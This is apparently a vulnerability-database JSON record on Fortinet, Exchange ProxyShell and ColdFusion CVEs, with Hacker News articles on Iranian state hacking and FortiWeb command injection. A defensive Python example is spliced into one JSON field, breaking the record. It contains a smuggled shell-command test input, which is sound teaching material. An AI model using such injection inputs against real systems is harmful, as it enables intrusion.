"idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:335640D886EC822FE646F8A943770825", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", 
"MALWAREBYTES:44699410831936C9D0A5C048B00776EE", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:F629837C88B5435ECA8E80D0F01621BA"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-GATHER-ADOBE_COLDFUSION_FILEREAD_CVE_2023_26360-", "MSF:EXPLOIT-MULTI-HTTP-ADOBE_COLDFUSION_RCE_CVE_2023_26360-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "mscve", "idList": ["MS:CVE-2021-34473"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "msrc", "idList": ["MSRC:8F98074A1D86F9B965ADC16597E286ED", "MSRC:C28CD823FBB321014DB6D53A28DA0CD1"]}, {"type": "mssecure", "idList": ["MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "nessus", "idList": ["COLDFUSION_WIN_APSB23-25.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FORTIOS_FG-IR-19-037.NASL", "FORTIOS_FG-IR-19-283.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL"]}, {"type": "nuclei", "idList": ["NUCLEI:CVE-2018-13379", "NUCLEI:CVE-2021-34473", "NUCLEI:CVE-2023-26360"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:163895", "PACKETSTORM:172079"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446"]}, {"type": 
"prion", "idList": ["PRION:CVE-2018-13379", "PRION:CVE-2019-5591", "PRION:CVE-2020-12812", "PRION:CVE-2021-31196", "PRION:CVE-2021-31206", "PRION:CVE-2021-34473", "PRION:CVE-2023-26360"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "QUALYSBLOG:7B5CCC9A0ADE13140C03A708CCBB4C4A", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:4E867F9E4F1818A4F797C0C8A1E26598", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:907F758757E4F4DFA2ED45E5B6AAC01E", "RAPID7BLOG:9D5A16A43EFEA30A49E1E70FD568C548", "RAPID7BLOG:AF89E3740FB97329034E56BA6E181ABB", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720"]}, {"type": "securelist", "idList": ["SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "talosblog", "idList": ["TALOSBLOG:18E1939F4F4AB01928AE1BD2B39FD681"]}, {"type": "thn", "idList": ["THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:3474CD6C25ADD60FF37EDC1774311111", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", 
"THN:63560DA43FB5804E3B258BC62E210EC4", "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:8483C1B45A5D7BF5D501DE72F5898935", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:878B3321978CDB69F46C7A415B46701B", "THN:8BA951AD00E17C72D6321234DBF80D19", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:934BF6B94312FDB8317CCD9F5E46677C", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:D10C2C7FC285D13E18415150A4507AB6", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:EAEDDF531EB90375B350E1580DE3DD02", "THN:F25FAD25E15EBBE4934883ABF480294D", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "threatpost", "idList": ["THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496"]}, {"type": "trellix", "idList": ["TRELLIX:21227249912602DD6E11D3B19898A7FF"]}, {"type": "zdi", "idList": ["ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-36667", "1337DAY-ID-38634"]}]}, "score": {"value": 9.8, "vector": "NONE"}, "epss": 
[{"cve": "CVE-2018-13379", "epss": 0.97505, "percentile": 0.99963, "modified": "2023-05-02"}, {"cve": "CVE-2019-5591", "epss": 0.00234, "percentile": 0.59971, "modified": "2023-05-02"}, {"cve": "CVE-2020-12812", "epss": 0.00687, "percentile": 0.77167, "modified": "2023-05-01"}, {"cve": "CVE-2021-34473", "epss": 0.97375, "percentile": 0.99825, "modified": "2023-05-01"}], "vulnersScore": 9.8}, "_state": {"dependencies": 1701891669, "score": 1701892172, "epss": 0}, "_internal": {"score_hash": "29fd77029ee17d1d9f3872d089c0ce46"}}
{"thn": [{"lastseen": "2022-05-09T12:38:05", "description": "Cybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday [released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. 
The flaws being exploited are listed below:\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold to a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. 
government has [warned](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending that organizations immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates are released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. 
and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:13", "description": "Details have emerged about a new unpatched security vulnerability in Fortinet's web application firewall (WAF) appliances that could be abused by a remote, authenticated attacker to execute malicious commands on the system.\n\n\"An OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) in an advisory published Tuesday. 
\"This vulnerability appears to be related to [CVE-2021-22123](<https://nvd.nist.gov/vuln/detail/CVE-2021-22123>), which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\"\n\nRapid7 said it discovered and reported the issue in June 2021. Fortinet is expected to release a patch at the end of August with version Fortiweb 6.4.1.\n\nThe command injection flaw is yet to be assigned a CVE identifier, but it has a severity rating of 8.7 on the CVSS scoring system. Successful exploitation of the vulnerability can allow authenticated attackers to execute arbitrary commands as the root user on the underlying system via the SAML server configuration page.\n\n\"An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\" Rapid7's Tod Beardsley said. \"They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\"\n\nRapid7 also warns that while authentication is a prerequisite for achieving arbitrary command execution, the exploit could be chained with an authentication bypass flaw, such as [CVE-2020-29015](<https://nvd.nist.gov/vuln/detail/CVE-2020-29015>). 
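The flaw class Rapid7 describes, a form field on a configuration page reaching a shell unescaped, is easiest to see next to its fix. The Python below is an added illustration written for this page, not FortiWeb's code or Rapid7's proof of concept: the hypothetical `saml_probe` binary, its flags and the function names are assumptions. The hardened variant shows the two controls that close the hole, an allowlist grammar for the host value and an argv call that never goes through a shell, and it stays hardened even if the authentication in front of it is later bypassed.

```python
import re
from ipaddress import ip_address

# Hypothetical helper binary standing in for whatever a management UI shells out to
# when an admin saves a SAML server entry (assumption, not a FortiWeb path).
PROBE = "/usr/bin/saml_probe"

# RFC 1123 hostname grammar: labels of letters, digits and hyphens, 1-63 chars,
# no leading or trailing hyphen. Anything else (';', '|', '$(', spaces) is rejected.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def build_probe_command_unsafe(saml_server: str) -> str:
    """Vulnerable pattern: the form value is spliced into a command string that
    the caller hands to the shell (subprocess.run(cmd, shell=True)). Shell
    metacharacters in the value become shell syntax, so an authenticated user
    of the configuration page gets command execution as the daemon's user."""
    return f"{PROBE} --server {saml_server} --timeout 5"


def validate_host(value: str) -> str:
    """Allowlist validation: accept an IPv4/IPv6 literal or a syntactically valid
    hostname and nothing else. Raises ValueError on anything that fails."""
    value = value.strip()
    if not value or len(value) > 253:
        raise ValueError("empty or over-long host")
    try:
        return str(ip_address(value))          # canonical IP literal
    except ValueError:
        pass
    if not _HOSTNAME_RE.fullmatch(value):
        raise ValueError(f"invalid host: {value!r}")
    return value.rstrip(".")


def build_probe_command_safe(saml_server: str) -> list[str]:
    """Hardened pattern: validate first, then build an argv list for
    subprocess.run(argv) with shell=False. No shell ever parses the value, and
    the grammar above already rejects a leading '-' so the host cannot be
    mistaken for an option by the child process."""
    host = validate_host(saml_server)
    return [PROBE, "--timeout", "5", "--server", host]


if __name__ == "__main__":
    payload = "idp.example.com; id > /tmp/pwned"   # constructed attacker input
    print("unsafe :", build_probe_command_unsafe(payload))
    try:
        build_probe_command_safe(payload)
    except ValueError as exc:
        print("safe   : rejected ->", exc)
    print("safe   :", build_probe_command_safe("idp.example.com"))
```

The validator rejects rather than sanitises: stripping metacharacters from a hostname field invites encoding tricks, while a strict grammar plus argv execution leaves nothing for a shell to interpret.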
In the interim, users are advised to block access to the FortiWeb device's management interface from untrusted networks, including taking steps to prevent direct exposure to the internet.\n\nAlthough there is no evidence that the new security issue has been exploited in the wild, it's worth noting that unpatched Fortinet servers have been a lucrative target for financially motivated and state-sponsored threat actors alike.\n\nEarlier this April, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.ic3.gov/Media/News/2021/210402.pdf>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) to compromise systems belonging to government and commercial entities.\n\nIn the same month, Russian cybersecurity company Kaspersky [revealed](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) that threat actors exploited the CVE-2018-13379 vulnerability in FortiGate VPN servers to gain access to enterprise networks in European countries to deploy the Cring ransomware.\n\n**_Update: _**Fortinet shared the following statement with The Hacker News:\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. 
As such, we had expected that Rapid7 hold any findings prior to the end of our 90-day responsible disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window. We are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T03:41:00", "type": "thn", "title": "Unpatched Remote Hacking Flaw Disclosed in Fortinet's FortiWeb WAF", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-19T06:50:20", "id": "THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "href": 
"https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T04:03:41", "description": "The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020.\n\nThe agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked under the names APT35, Charming Kitten, Nemesis Kitten, Phosphorus, and TunnelVision.\n\n\"This group has launched extensive campaigns against organizations and officials across the globe, particularly targeting U.S. 
and Middle Eastern defense, diplomatic, and government personnel, as well as private industries including media, energy, business services, and telecommunications,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0948>).\n\nThe Nemesis Kitten actor, which is also known as [Cobalt Mirage](<https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html>), [DEV-0270](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>), and [UNC2448](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>), has come under the scanner in recent months for its pattern of ransomware attacks for opportunistic revenue generation using Microsoft's built-in BitLocker tool to encrypt files on compromised devices.\n\nMicrosoft and Secureworks have characterized DEV-0270 as a subgroup of [Phosphorus](<https://thehackernews.com/2022/09/iranian-hackers-target-high-value.html>) (aka Cobalt Illusion), with ties to another actor referred to as [TunnelVision](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>). The Windows maker also assessed with low confidence that \"some of DEV-0270's ransomware attacks are a form of moonlighting for personal or company-specific revenue generation.\"\n\nWhat's more, independent analyses from the two cybersecurity firms as well as Google-owned [Mandiant](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>) have revealed the group's connections to two companies, Najee Technology (which functions under the aliases Secnerd and Lifeweb) and Afkar System, both of which have been subjected to U.S. 
sanctions.\n\nIt's worth noting that Najee Technology and Afkar System's connections to the Iranian intelligence agency were first flagged by an anonymous anti-Iranian regime entity called [Lab Dookhtegan](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>) [earlier](<https://mobile.twitter.com/LabDookhtegan2/status/1520355269695442945>) this [year](<https://mobile.twitter.com/LabDookhtegan2/status/1539960629867401218>).\n\n\"The model of Iranian government intelligence functions using contractors blurs the lines between the actions tasked by the government and the actions that the private company takes on its own initiative,\" Secureworks said in a [new report](<https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors>) detailing the activities of Cobalt Mirage.\n\nWhile exact links between the two companies and IRGC remain unclear, the method of private Iranian firms acting as fronts or providing support for intelligence operations is well established over the years, including that of [ITSecTeam (ITSEC), Mersad](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>), [Emennet Pasargad](<https://thehackernews.com/2021/11/us-charged-2-iranians-hackers-for.html>), and [Rana Intelligence Computing Company](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>).\n\nOn top of that, the Secureworks probe into a June 2022 Cobalt Mirage incident showed that a PDF file containing the ransom note was created on December 17, 2021, by an \"Ahmad Khatibi\" and timestamped at UTC+03:30 time zone, which corresponds to the Iran Standard Time. 
Khatibi, incidentally, happens to be the CEO and owner of the Iranian company Afkar System.\n\nAhmad Khatibi Aghda is also part of the 10 individuals sanctioned by the U.S., alongside Mansour Ahmadi, the CEO of Najee Technology, and other employees of the two enterprises who are said to be complicit in targeting various networks globally by leveraging well-known security flaws to gain initial access to further follow-on attacks.\n\nSome of the [exploited flaws](<https://www.cisa.gov/uscert/ncas/alerts/aa22-257a>), according to a [joint cybersecurity advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/14/iranian-islamic-revolutionary-guard-corps-affiliated-cyber-actors>) released by Australia, Canada, the U.K., and the U.S., as part of the IRGC-affiliated actor activity are as follows -\n\n * Fortinet FortiOS path traversal vulnerability ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>))\n * Fortinet FortiOS default configuration vulnerability ([CVE-2019-5591](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * Fortinet FortiOS SSL VPN 2FA bypass vulnerability ([CVE-2020-12812](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and\n * [Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105)\n\n\"Khatibi is among the cyber actors who gained unauthorized access to victim networks to encrypt the network with BitLocker and demand a ransom for the decryption keys,\" the U.S. 
government said, in addition to adding him to the FBI's [Most Wanted list](<https://www.fbi.gov/wanted/cyber/ahmad-khatibi-aghda>).\n\n\"He leased network infrastructure used in furtherance of this malicious cyber group's activities, he participated in compromising victims' networks, and he engaged in ransom negotiations with victims.\"\n\nCoinciding with the sanctions, the Justice Department separately [indicted](<https://www.justice.gov/usao-nj/pr/three-iranian-nationals-charged-engaging-computer-intrusions-and-ransomware-style>) Ahmadi, Khatibi, and a third Iranian national named Amir Hossein Nickaein Ravari for engaging in a criminal extortion scheme to inflict damage and losses to victims located in the U.S., Israel, and Iran.\n\nAll three individuals have been charged with one count of conspiring to commit computer fraud and related activity in connection with computers; one count of intentionally damaging a protected computer; and one count of transmitting a demand in relation to damaging a protected computer. Ahmadi has also been charged with one more count of intentionally damaging a protected computer.\n\nThat's not all. The U.S. State Department has also [announced monetary rewards](<https://www.state.gov/sanctioning-iranians-for-malicious-cyber-acts/>) of up to $10 million for any information about [Mansour, Khatibi, and Nikaeen](<https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=cyber:3266>) and their whereabouts.\n\n\"These defendants may have been hacking and extorting victims \u2013 including critical infrastructure providers \u2013 for their personal gain, but the charges reflect how criminals can flourish in the safe haven that the Government of Iran has created and is responsible for,\" Assistant Attorney General Matthew Olsen said.\n\nThe development comes close on the heels of [sanctions](<https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html>) imposed by the U.S. 
against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-15T06:49:00", "type": "thn", "title": "U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-09-16T03:17:57", "id": "THN:802C6445DD27FFC7978D22CC3182AD58", "href": "https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2021-09-09T08:35:28", "description": "Network security solutions provider Fortinet confirmed that a malicious actor had disclosed, without authorization, VPN login names and passwords associated with 87,000 FortiGate SSL-VPN devices.\n\n\"These credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>) at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable,\" the company [said](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) in a statement on Wednesday.\n\nThe disclosure comes after the threat actor leaked a list of Fortinet credentials for free on a new Russian-speaking forum called [RAMP](<https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/>) that launched in July 2021 as well as on Groove ransomware's data leak site, with Advanced Intel [noting](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>) that the \"breach list contains raw access to the top companies\" spanning across 74 countries, including India, Taiwan, Italy, France, and Israel. \"2,959 out of 22,500 victims are U.S. entities,\" the researchers said.\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) relates to a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext. 
